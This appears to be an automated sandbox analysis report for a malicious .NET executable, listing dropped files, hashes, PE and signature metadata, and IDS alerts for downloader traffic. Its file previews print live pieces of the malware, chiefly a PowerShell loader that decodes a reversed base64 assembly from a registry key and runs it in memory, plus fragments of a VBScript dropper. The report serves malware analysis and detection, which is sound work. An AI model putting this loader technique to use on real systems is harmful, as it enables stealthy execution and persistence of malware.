                          SHA1:AB15AC73D984AEE741F2ED5E169C734FD3ADB673
                          SHA-256:2C7BED584F136B6FAC5820FD762D377A550D7E31EB35B66CF61818ECAF177E23
                          SHA-512:B4F2585CFACD11C948772DC4BC34A5CBA3D8113761852C88E2BA23EF4AB1EF50DA28C155DE711264D735D895DFB321017CCE22FD89F39D3089A3D60DF9A2ECCC
                          Malicious:true
                          Preview:..#.@.~.^.t.x.o.A.A.A.=.=.v.6.1.i.z.K.k.S.M.k.V...2.I.a.x.@.#.@.&.}.w.O.r.K.x.P.A.a.w.^.k.m.b.O.@.#.@.&.@.#.@.&.E.P.].W.;.O.b.x.n.P.a...k...m.r.2.m.V.+.~.l.,.2.a.....m.!.O.b.W.U.,.N.!.P./.1.D.b.2.Y.@.#.@.&.j.E.(.P.3.a...m.E.D.n.D.U.m.D.b.2.O.n.M.k...m.r.w.C.s.v.#.@.#.@.&.,.~.P.,.f.r.h.,./.X.d.O...:.n.?.4.n.^.V.S.,.m.4.+.:.b.x.w.r.m.4.k.n.D.A.x...n.T.k./.D...+.s.+.x.D.S.~.m.4.+.s.k.U.f.;.j.1.D.r.w.D.@.#.@.&.,.P.~.~.G.k.:.~.[.K.x.U.+...d.U.+.L.s.+...Y.+.../.B.~.w.m.D.O.k...f.n.8.!.Y.~.,.2.l.M.Y.k...j.;.k.D.+.@.#.@.&.@.#.@.&.~.~.,.P.j.+.D.~./.H./.O.n.s.+.?.4.n.^.V.~.'.,./.M.+.C.D.+.}.4.L...m.D.c.J.q.?.^.D.b.w.O. .U.t.+.^.s.J.*.@.#.@.&.,.~.~.P.1.t...:.r.x.o.r.1.t.r.+.M.3.x.M.+.L.r.k.Y.D.n.h...x.O.P.{.~.r.0.H.`.b.:./.S.V./.^.n.w.".w.U.J.@.#.@.&.~.~.,.P.m.4.n.:.b.x.f.!.j.^.D.b.w.D.P.x.P.6.8.D.+.U.k.M./.t...:.r.U.G.E.?.^...b.w.O.`.k.z.k.Y.n.s.+.U.t.+.^.V.B.~.m.4.+.h.k...s.r.^.4.k.+.M.3.x.M.+.o.b.d.O.D...:...x.O.#.@.#.@.&.,.P.~.P.@.#.@.&.P.,.P.~.v.,.f.....0.r.U.b.Y.r.W...~.9.+.d.,.m.K.x.Y...x.
                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                          File Type:ASCII text, with CRLF line terminators
                          Category:dropped
                          Size (bytes):1260
                          Entropy (8bit):5.397777491503
                          Encrypted:false
                          SSDEEP:24:X2EQWEy2LdR2O2EQWEy2LdR2O2EQWEy2LdR2O2EQWEy2LdR2O2EQWEy2LdR2o:XiW0WOiW0WOiW0WOiW0WOiW0Wo
                          MD5:A72B2DAAD164C0F773B682CA6CFF0E08
                          SHA1:0296389E7CDA8E3324F48ED84E62E7C11D8AC57F
                          SHA-256:D2AD0D84932290A3D007F2955041F7A60BC00E709DCDEB1065C56968A8E1B748
                          SHA-512:979680721D158B4AAA2C8A46357411C6B0BF58A3A4F41A6D79358D64A05AA0F961BFF15D8DB2A64E31E346B525393BE96366D3809CC20E04A59FF4458F70926E
                          Malicious:false
                          Preview:[AppDomain]::CurrentDomain.Load([Convert]::FromBase64String((-join (Get-ItemProperty -LiteralPath 'HKCU:\Software\fNUATsLGslepRpn' -Name 's').s | ForEach-Object {$_[-1..-($_.Length)]}))); [a.a]::a('fNUATsLGslepRpn')..Stop-Process -Name conhost -Force..[AppDomain]::CurrentDomain.Load([Convert]::FromBase64String((-join (Get-ItemProperty -LiteralPath 'HKCU:\Software\fNUATsLGslepRpn' -Name 's').s | ForEach-Object {$_[-1..-($_.Length)]}))); [a.a]::a('fNUATsLGslepRpn')..Stop-Process -Name conhost -Force..[AppDomain]::CurrentDomain.Load([Convert]::FromBase64String((-join (Get-ItemProperty -LiteralPath 'HKCU:\Software\fNUATsLGslepRpn' -Name 's').s | ForEach-Object {$_[-1..-($_.Length)]}))); [a.a]::a('fNUATsLGslepRpn')..Stop-Process -Name conhost -Force..[AppDomain]::CurrentDomain.Load([Convert]::FromBase64String((-join (Get-ItemProperty -LiteralPath 'HKCU:\Software\fNUATsLGslepRpn' -Name 's').s | ForEach-Object {$_[-1..-($_.Length)]}))); [a.a]::a('fNUATsLGslepRpn')..Stop-Process -Name conhost
                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                          File Type:data
                          Category:dropped
                          Size (bytes):6224
                          Entropy (8bit):3.7262273362286513
                          Encrypted:false
                          SSDEEP:96:/f/3CLT9kvhkvCCt3rZ8X2BHYrZ8X2BHA:/fcF3rZS/rZSt
                          MD5:2AFAF2863A6D11F22076E3C5E80C62DF
                          SHA1:6D93FD21A0FF6640AA407E2702208FE5260114D3
                          SHA-256:1FA7AC1B43E8FDEF1AEC2B11D27569B5753D5E75CDECDFBF8F3FB67AC6570EFE
                          SHA-512:8BD5BEE72C27C439D3A8D14751A19D379C2A3EB4A1316848F2EFFB9C58AF0ED851EE32487D5BEEB7E103DF387DD1BD1EFAC5882C1B7F25F2308DA02270BFD2F2
                          Malicious:false
                          Preview:...................................FL..................F.".. ...J.S...{..e....z.:{.............................:..DG..Yr?.D..U..k0.&...&.......$..S.....3W.....e..........t...CFSF..1.....EW<2..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......EW<2.Y`............................^.A.p.p.D.a.t.a...B.V.1......Yi...Roaming.@......EW<2.Yi...../.....................2.%.R.o.a.m.i.n.g.....\.1.....EW.3..MICROS~1..D......EW<2.YY.....0.....................Q%0.M.i.c.r.o.s.o.f.t.....V.1......Yl...Windows.@......EW<2.Yr.....2.....................KZ .W.i.n.d.o.w.s.......1.....EW@2..STARTM~1..n......EW<2.YY.....5...............D.......Y.S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.......1.....EWz5..Programs..j......EW<2.YY.....6...............@.....M.n.P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.....n.1......O.K..WINDOW~1..V......EW<2.Yj.....7.....................d...W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....z.2......O.I .WINDOW~1.LNK..^......EW<2.Yj.....u...........
                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                          File Type:data
                          Category:dropped
                          Size (bytes):6224
                          Entropy (8bit):3.724700997052021
                          Encrypted:false
                          SSDEEP:96:tyi3CLT9kvhkvCCt3rZ8X2zHYrZ8X2BHA:tyTF3rZSNrZSt
                          MD5:ADE0008792CFA0A656D421CB90D2FE99
                          SHA1:0B09926CEA635AF41556AC19E4B7FA0237BC159D
                          SHA-256:1347162096E503325C8FB2CBD1D4F7E1C587BDB59562056F3B81982CEE7C3EEC
                          SHA-512:3AAC4D081E76956AE7C9C917848E738882CD474C74E13C4AEBDDF116F096E77CC2618546F27D6BCCC81186AA21610C26710FC98F8218C7BD5EE33A985AF91546
                          Malicious:false
                          Preview:...................................FL..................F.".. ...J.S.....pe....z.:{.............................:..DG..Yr?.D..U..k0.&...&.......$..S.....3W....QU.e........t...CFSF..1.....EW<2..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......EW<2.Y`............................^.A.p.p.D.a.t.a...B.V.1......Yi...Roaming.@......EW<2.Yi...../.....................2.%.R.o.a.m.i.n.g.....\.1.....EW.3..MICROS~1..D......EW<2.YY.....0.....................Q%0.M.i.c.r.o.s.o.f.t.....V.1.....EW.5..Windows.@......EW<2.YY.....2.......................L.W.i.n.d.o.w.s.......1.....EW@2..STARTM~1..n......EW<2.YY.....5...............D.......Y.S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.......1.....EWz5..Programs..j......EW<2.YY.....6...............@.....M.n.P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.....n.1......O.K..WINDOW~1..V......EW<2EW<2....7.....................d...W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....z.2......O.I .WINDOW~1.LNK..^......EW<2.Yj.....u...........
                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                          File Type:data
                          Category:dropped
                          Size (bytes):6224
                          Entropy (8bit):3.725292033384712
                          Encrypted:false
                          SSDEEP:96:jf/3CLT9kvhkvCCt3rZ8X2BHYrZ8X2BHA:jfcF3rZS/rZSt
                          MD5:F03805FFF47AB156E697543B9BEE061F
                          SHA1:2BB8E451DC17928D9410AA2EF3031AC388D40C8F
                          SHA-256:B607E1C87D2ED38A53831F311E5E5FEBCF418AD924195C6AB944A3576CFFB20B
                          SHA-512:3AEA22DB4D21F16FE9E6DAE7759352612AE1B5C4AED92FA14FE66105807E98DC072EC9456FA24E400B8CD19E6F22D5EFE52B2ED72A25119448239934ED28A84F
                          Malicious:false
                          Preview:...................................FL..................F.".. ...J.S...{..e....z.:{.............................:..DG..Yr?.D..U..k0.&...&.......$..S.....3W.....@d.........t...CFSF..1.....EW<2..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......EW<2.Y`............................^.A.p.p.D.a.t.a...B.V.1......Yi...Roaming.@......EW<2.Yi...../.....................2.%.R.o.a.m.i.n.g.....\.1.....EW.3..MICROS~1..D......EW<2.YY.....0.....................Q%0.M.i.c.r.o.s.o.f.t.....V.1......Yl...Windows.@......EW<2.Yr.....2.....................KZ .W.i.n.d.o.w.s.......1.....EW@2..STARTM~1..n......EW<2.YY.....5...............D.......Y.S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.......1.....EWz5..Programs..j......EW<2.YY.....6...............@.....M.n.P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.....n.1......O.K..WINDOW~1..V......EW<2.Yj.....7.....................d...W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....z.2......O.I .WINDOW~1.LNK..^......EW<2.Yj.....u...........
                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                          File Type:data
                          Category:dropped
                          Size (bytes):6224
                          Entropy (8bit):3.7251830332224074
                          Encrypted:false
                          SSDEEP:96:ef/3CLT9kvhkvCCt3rZ8X2BHYrZ8X2BHA:efcF3rZS/rZSt
                          MD5:9E87AFC5F134A6452690BAE2DECD0F39
                          SHA1:224B4F6FDC2C7B3669C259E967DBD2EE7BFC9C56
                          SHA-256:7930D56A8E01C1C14F62CF2BD496B7AF676BAF29D674B865641BFE7C7C556DBD
                          SHA-512:E3A73F04E4B4E127F7F0420B235A4D99B9343C73B3C6220F18DD91261EB40B0DA148088FE171BD5D5D92601C183AA5EF999E22B67D15FF0F1E15FBF4E4884798
                          Malicious:false
                          Preview:...................................FL..................F.".. ...J.S...{..e....z.:{.............................:..DG..Yr?.D..U..k0.&...&.......$..S.....3W....d.+x........t...CFSF..1.....EW<2..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......EW<2.Y`............................^.A.p.p.D.a.t.a...B.V.1......Yi...Roaming.@......EW<2.Yi...../.....................2.%.R.o.a.m.i.n.g.....\.1.....EW.3..MICROS~1..D......EW<2.YY.....0.....................Q%0.M.i.c.r.o.s.o.f.t.....V.1......Yl...Windows.@......EW<2.Yr.....2.....................KZ .W.i.n.d.o.w.s.......1.....EW@2..STARTM~1..n......EW<2.YY.....5...............D.......Y.S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.......1.....EWz5..Programs..j......EW<2.YY.....6...............@.....M.n.P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.....n.1......O.K..WINDOW~1..V......EW<2.Yj.....7.....................d...W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....z.2......O.I .WINDOW~1.LNK..^......EW<2.Yj.....u...........
                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                          File Type:data
                          Category:dropped
                          Size (bytes):6224
                          Entropy (8bit):3.7261790433966007
                          Encrypted:false
                          SSDEEP:96:4f/3CLT9kvhkvCCt3rZ8X2BHYrZ8X2BHA:4fcF3rZS/rZSt
                          MD5:818A10E672C425DC06DD9C98F2E4AABA
                          SHA1:322630CB1DF039FC149B30E5F06DCD9CED5A3964
                          SHA-256:B813B61F513423F9BBCE15BD3F570912B770EA262D9FE6D2E9C3909464B7D363
                          SHA-512:3E804C5F60E43EF239D75D1EB91BEA4C44797CE61AACA2118F7F027991808107A7CBABF3EF14E6887794AA02EAD41A9C8A3FFF9C7834EFB993363CCB7B11FE9D
                          Malicious:false
                          Preview:...................................FL..................F.".. ...J.S...{..e....z.:{.............................:..DG..Yr?.D..U..k0.&...&.......$..S.....3W.....Zy.........t...CFSF..1.....EW<2..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......EW<2.Y`............................^.A.p.p.D.a.t.a...B.V.1......Yi...Roaming.@......EW<2.Yi...../.....................2.%.R.o.a.m.i.n.g.....\.1.....EW.3..MICROS~1..D......EW<2.YY.....0.....................Q%0.M.i.c.r.o.s.o.f.t.....V.1......Yl...Windows.@......EW<2.Yr.....2.....................KZ .W.i.n.d.o.w.s.......1.....EW@2..STARTM~1..n......EW<2.YY.....5...............D.......Y.S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.......1.....EWz5..Programs..j......EW<2.YY.....6...............@.....M.n.P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.....n.1......O.K..WINDOW~1..V......EW<2.Yj.....7.....................d...W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....z.2......O.I .WINDOW~1.LNK..^......EW<2.Yj.....u...........
                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                          File Type:data
                          Category:dropped
                          Size (bytes):6224
                          Entropy (8bit):3.7269884879991744
                          Encrypted:false
                          SSDEEP:96:If/3CLT9kvhkvCCt3rZ8X2BHYrZ8X2BHA:IfcF3rZS/rZSt
                          MD5:A84F947FDF42CEB6F87DEF445E3BF063
                          SHA1:521BD5B805600A97AA052E00619EB2DC05A71F5F
                          SHA-256:5EFD48D90803B2AC00B17DCE415F7EA67A2CBE63D4CA0B95BD89F8FB3A335097
                          SHA-512:8E9B8491247666998727B7E31C49509855D0EAD2B2F495EEE7E6D2029B2C06E02C2D930F11A731A631F7160B409D93CD00923463207B6E6E241EC2246504384C
                          Malicious:false
                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                          File Type:data
                          Category:dropped
                          Size (bytes):6224
                          Entropy (8bit):3.727304179071042
                          Encrypted:false
                          SSDEEP:96:ayi3CLT9kvhkvCCt3rZ8X2BHYrZ8X2BHA:ayTF3rZS/rZSt
                          MD5:B4BD11194E92BE898681B7C2470A2D5E
                          SHA1:87906D565191197CFF8CFB74B584456B4AE687EB
                          SHA-256:D98515EE93DBDFA25F6A62F7F68FB566A56C7EBED45157F11D808E609CB5CBDA
                          SHA-512:DF43FB0B883A35A94CEB9F468A9027E9293B348F013E5E811BA0F8D8AD336520C893C58AAEF053AB844570A709A055B7A61EA482019FC6629029466FAD674445
                          Malicious:false
                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                          File Type:data
                          Category:dropped
                          Size (bytes):6224
                          Entropy (8bit):3.724700997052021
                          Encrypted:false
                          SSDEEP:96:tyi3CLT9kvhkvCCt3rZ8X2zHYrZ8X2BHA:tyTF3rZSNrZSt
                          MD5:ADE0008792CFA0A656D421CB90D2FE99
                          SHA1:0B09926CEA635AF41556AC19E4B7FA0237BC159D
                          SHA-256:1347162096E503325C8FB2CBD1D4F7E1C587BDB59562056F3B81982CEE7C3EEC
                          SHA-512:3AAC4D081E76956AE7C9C917848E738882CD474C74E13C4AEBDDF116F096E77CC2618546F27D6BCCC81186AA21610C26710FC98F8218C7BD5EE33A985AF91546
                          Malicious:false
                          Process:C:\Users\user\Desktop\doc1.exe
                          File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                          Category:dropped
                          Size (bytes):1118840
                          Entropy (8bit):7.84182618843344
                          Encrypted:false
                          SSDEEP:24576:ZlmXjCShkN8Hy//wZhBcV7ilbN1/39e48e:ZlmXjCJN8SXwVL1/9e48e
                          MD5:FDDD99D918C32A807CD1761C519B086B
                          SHA1:8CF7E4C454F20D2AB851BB6E18A4250B7AF4157C
                          SHA-256:5CD8E28712872382CACAC0D338A4D041E291B89D41A4DAF69EABEFE7EC46F920
                          SHA-512:5243BA74B6919A3D96DFFDA1A598C47A3CE80426136ABE769FA19BF9A138DE64A7DB87EFB2A5CFE6C7BB1E5BDC8655169DEFE54EE79D3D7EBE16817807EBB06A
                          Malicious:true
                          Antivirus:
                          • Antivirus: ReversingLabs, Detection: 53%
                          Process:C:\Users\user\Desktop\doc1.exe
                          File Type:ASCII text, with CRLF line terminators
                          Category:modified
                          Size (bytes):26
                          Entropy (8bit):3.95006375643621
                          Encrypted:false
                          SSDEEP:3:ggPYV:rPYV
                          MD5:187F488E27DB4AF347237FE461A079AD
                          SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                          SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                          SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                          Malicious:true
                          Preview:[ZoneTransfer]....ZoneId=0
                          Process:C:\Windows\SysWOW64\wscript.exe
                          File Type:ISO-8859 text
                          Category:dropped
                          Size (bytes):2108
                          Entropy (8bit):4.910710452068364
                          Encrypted:false
                          SSDEEP:48:NmVsWD6IIWZrMnPmklEX/AEdFJJmqgjHjJvRWggnf9BxZRmz6/u4q:NmVLQk27vWnfVZxuV
                          MD5:5F8C9EAA961FD5CEABEB785D2427CC0C
                          SHA1:D44CB5B6D0715D2D1027A345AC30010C69A9CCD7
                          SHA-256:E205AA6B623C2A0CCFA28517C29E665B2E3B75CC7B2C22DB2B6F61DD00893F87
                          SHA-512:50435E2B26A49D4F6071783E78602E48DFD1AE8DD85E7ABDFD93ACFA4402F400AE9D4E6509FF24D1EF2B96B13C415787EC2BE4D10BB5428424F41A2E06B912E8
                          Malicious:true
                          Preview:Option Explicit.'Nom du projet: fNUATsLGslepRpn.' Initialisation des objets et variables.Dim gestionnaireShell, repertoireSysteme, iteration.Set gestionnaireShell = CreateObject("WScript.Shell").repertoireSysteme = gestionnaireShell.ExpandEnvironmentStrings("%windir%")..' Fonction pour v.rifier l'ex.cution d'un processus.Function ProcessusEstActif(nomDuProcessus). Dim gestionnaireWMI, listeDesProcessus. Set gestionnaireWMI = GetObject("winmgmts:\\.\root\cimv2"). Set listeDesProcessus = gestionnaireWMI.ExecQuery("SELECT * FROM Win32_Process WHERE Name='" & nomDuProcessus & "'"). . ProcessusEstActif = (listeDesProcessus.Count > 0).End Function..' Proc.dure pour ex.cuter des commandes PowerShell.Sub LancerCommandesPowerShell(). Dim listeDesProcessus, processusActif. . ' Ex.cuter PowerShell avec une fen.tre normale. gestionnaireShell.Run repertoireSysteme & "\system32\WindowsPowerShell\v1.0\powershell.exe", 2. . ' Rechercher le processus PowerShell et ex.cu
                          Process:C:\Windows\System32\svchost.exe
                          File Type:JSON data
                          Category:dropped
                          Size (bytes):55
                          Entropy (8bit):4.306461250274409
                          Encrypted:false
                          SSDEEP:3:YDQRWu83XfAw2fHbY:YMRl83Xt2f7Y
                          MD5:DCA83F08D448911A14C22EBCACC5AD57
                          SHA1:91270525521B7FE0D986DB19747F47D34B6318AD
                          SHA-256:2B4B2D4A06044AD0BD2AE3287CFCBECD90B959FEB2F503AC258D7C0A235D6FE9
                          SHA-512:96F3A02DC4AE302A30A376FC7082002065C7A35ECB74573DE66254EFD701E8FD9E9D867A2C8ABEB4C482738291B715D4965A0D2412663FDF1EE6CBC0BA9FBACA
                          Malicious:false
                          Preview:{"fontSetUri":"fontset-2017-04.json","baseUri":"fonts"}
                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                          File Type:ASCII text, with very long lines (875), with CRLF line terminators, with escape sequences
                          Category:dropped
                          Size (bytes):1685
                          Entropy (8bit):4.518193649342236
                          Encrypted:false
                          SSDEEP:48:E/WxZzrWxZzrfXWjAX+X5XpXKX/XFXoXQXDX5:E/EZzrEZzrfXWj4
                          MD5:4F176405CBAEF5D68CD6C9C5133F4C5E
                          SHA1:E349016A415A74E70F427B4F81DBCF2A4B43C3E7
                          SHA-256:4DF92808FB1E0C12B3B3A292886741F1E3172DF6E7CED4DB19D27C7B89BB57BD
                          SHA-512:D4BDE7B7A20FD0FBD309F74014FA1584B5AA9CC6B146DAB164AF9AB88D3014F9F4A0FC34A2844E21C297CD058C45A11FE9B81E464392552BCC4E1A552EB9D750
                          Malicious:false
                          Preview:.[91m> .[0m.[93m[.[33m.[45m.[0m.[33m[.[37mAppDomain.[33m]::.[97mCurrentDomain.[33m..[97mLoad.[33m([.[37mConvert.[33m]::.[97mFromBase64String.[33m((.[90m-join.[33m.[45m .[33m(.[93mGet-ItemProperty.[33m.[45m .[90m-LiteralPath.[33m.[45m .[36m'HKCU:\Software\fNUA.[33m.[45m.[0m.[33m.[45m> .[0m.[33m[.[37mAppDomain.[33m]::.[97mCurrentDomain.[33m..[97mLoad.[33m([.[37mConvert.[33m]::.[97mFromBase64String.[33m((.[90m-join.[33m.[45m .[33m(.[93mGet-ItemProperty.[33m.[45m .[90m-LiteralPath.[33m.[45m .[36m'HKCU:\Software\fNUATsLGslepRpn'.[33m.[45m .[90m-Name.[33m.[45m .[36m's'.[33m)..[97ms.[33m.[45m .[33m|.[33m.[45m .[93mForEach-Object.[33m.[45m .[33m{.[92m$_.[33m[.[97m-1.[90m..-.[33m(.[92m$_.[33m..[97mLength.[33m)]})));.[33m.[45m .[33m[.[37ma.a.[33m]::.[97ma.[33m(.[36m'fNUATsLGslepRpn'.[33m).[0mstep 1..etape 2...[93mStop-Process.[33m.[45m .[90m-Name.[33m.[45m .[33mconho.[33m.[45m.[0m.[93mStop-Process.[33m.[45m .[90m-Name.[33m.[45m .[33mconhos.[33m.[45m.[0m.[93mStop-Process.[33m.[45m .[90m-Name.[33m
                          File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                          Entropy (8bit):7.84182618843344
                          TrID:
                          • Win32 Executable (generic) Net Framework (10011505/4) 50.01%
                          • Win32 Executable (generic) a (10002005/4) 49.97%
                          • Generic Win/DOS Executable (2004/3) 0.01%
                          • DOS Executable Generic (2002/1) 0.01%
                          • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                          File name:doc1.exe
                          File size:1'118'840 bytes
                          MD5:fddd99d918c32a807cd1761c519b086b
                          SHA1:8cf7e4c454f20d2ab851bb6e18a4250b7af4157c
                          SHA256:5cd8e28712872382cacac0d338a4d041e291b89d41a4daf69eabefe7ec46f920
                          SHA512:5243ba74b6919a3d96dffda1a598c47a3ce80426136abe769fa19bf9a138de64a7db87efb2a5cfe6c7bb1e5bdc8655169defe54ee79d3d7ebe16817807ebb06a
                          SSDEEP:24576:ZlmXjCShkN8Hy//wZhBcV7ilbN1/39e48e:ZlmXjCJN8SXwVL1/9e48e
                          TLSH:DC35E185269C4D67FEE93A3494B22D1C2E297F83B83DB28F714DB0981863F44D591F26
                          Icon Hash:16832c2c2e2d4797
                          Entrypoint:0x4feeae
                          Entrypoint Section:.text
                          Digitally signed:true
                          Imagebase:0x400000
                          Subsystem:windows gui
                          Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                          DLL Characteristics:HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                          Time Stamp:0x66CD0037 [Mon Aug 26 22:22:47 2024 UTC]
                          TLS Callbacks:
                          CLR (.Net) Version:
                          OS Version Major:4
                          OS Version Minor:0
                          File Version Major:4
                          File Version Minor:0
                          Subsystem Version Major:4
                          Subsystem Version Minor:0
                          Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744
                          Signature Valid:false
                          Signature Issuer:CN=GlobalSign GCC R45 EV CodeSigning CA 2020, O=GlobalSign nv-sa, C=BE
                          Signature Validation Error:The digital signature of the object did not verify
                          Error Number:-2146869232
                          Not Before, Not After
                          • 19/10/2023 11:33:01 19/10/2024 11:33:01
                          Subject Chain
                          • CN=Helpfeel Inc, OU=開発部, O=Helpfeel Inc, STREET=110-16 Goshohachiman-cho, L="Kyoto-shi, Kamigyo-ku", S=Kyoto, C=JP, OID.1.3.6.1.4.1.311.60.2.1.3=JP, SERIALNUMBER=1300-01-068185, OID.2.5.4.15=Private Organization
                          Version:3
                          Thumbprint MD5:0D966BC363CD56690E80EE36566E3C7B
                          Thumbprint SHA-1:A955D2CBD3F7D394053A3C5219A93AF13917EA0D
                          Thumbprint SHA-256:2362CABC8423B1EE01F2DE0F40197E509F8FA6DCF631E687EDB44792B241E526
                          Serial:138A5335DB02BAFDC71DC47A
                          Instruction
                          jmp dword ptr [00402000h]
                          add byte ptr [eax], al
                          Name | Virtual Address | Virtual Size | Is in Section
                          IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
                          IMAGE_DIRECTORY_ENTRY_IMPORT | 0xfee54 | 0x57 | .text
                          IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x100000 | 0x10eca | .rsrc
                          IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
                          IMAGE_DIRECTORY_ENTRY_SECURITY | 0x10e400 | 0x2e78 |
                          IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x112000 | 0xc | .reloc
                          IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
                          IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
                          IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
                          IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
                          IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
                          IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
                          IMAGE_DIRECTORY_ENTRY_IAT | 0x2000 | 0x8 | .text
                          IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
                          IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x2008 | 0x48 | .text
                          IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
                          Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
                          .text | 0x2000 | 0xfceb4 | 0xfd000 | 632200fd9fe2ae44dde2fc6d593776ad | False | 0.9346040868947628 | data | 7.920829116713707 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                          .rsrc | 0x100000 | 0x10eca | 0x11000 | a23b02ef0d6b6a2fb92680a71c17cf3c | False | 0.10861385569852941 | data | 4.628626117358337 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                          .reloc | 0x112000 | 0xc | 0x200 | 258158747a44ea0205d07224e98404da | False | 0.044921875 | data | 0.10191042566270775 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                          Name | RVA | Size | Type | Language | Country | ZLIB Complexity
                          RT_ICON | 0x100130 | 0x10828 | Device independent bitmap graphic, 128 x 256 x 32, image size 65536, resolution 60472 x 60472 px/m | | | 0.0999940849402579
                          RT_GROUP_ICON | 0x110958 | 0x14 | data | | | 1.15
                          RT_VERSION | 0x11096c | 0x374 | data | | | 0.4242081447963801
                          RT_MANIFEST | 0x110ce0 | 0x1ea | XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators | | | 0.5489795918367347
                          DLL | Import
                          mscoree.dll | _CorExeMain
                          Timestamp | Protocol | SID | Signature | Severity | Source Port | Dest Port | Source IP | Dest IP
                          2024-08-27T20:03:17.501424+0200 | TCP | 2803274 | ETPRO MALWARE Common Downloader Header Pattern UH | 2 | 49716 | 80 | 192.168.2.6 | 158.101.44.242
                          2024-08-27T20:03:48.769226+0200 | TCP | 2803305 | ETPRO MALWARE Common Downloader Header Pattern H | 3 | 49760 | 443 | 192.168.2.6 | 188.114.97.3
                          2024-08-27T20:03:50.512395+0200 | TCP | 2803305 | ETPRO MALWARE Common Downloader Header Pattern H | 3 | 49764 | 443 | 192.168.2.6 | 188.114.97.3
                          2024-08-27T20:03:39.720201+0200 | TCP | 2803274 | ETPRO MALWARE Common Downloader Header Pattern UH | 2 | 49742 | 80 | 192.168.2.6 | 158.101.44.242
                          2024-08-27T20:03:48.682864+0200 | TCP | 2803305 | ETPRO MALWARE Common Downloader Header Pattern H | 3 | 49759 | 443 | 192.168.2.6 | 188.114.97.3
                          2024-08-27T20:03:53.734932+0200 | TCP | 2803305 | ETPRO MALWARE Common Downloader Header Pattern H | 3 | 49768 | 443 | 192.168.2.6 | 188.114.97.3
                          2024-08-27T20:03:21.704538+0200 | TCP | 2803274 | ETPRO MALWARE Common Downloader Header Pattern UH | 2 | 49723 | 80 | 192.168.2.6 | 158.101.44.242
                          2024-08-27T20:03:41.556919+0200 | TCP | 2803305 | ETPRO MALWARE Common Downloader Header Pattern H | 3 | 49747 | 443 | 192.168.2.6 | 188.114.97.3
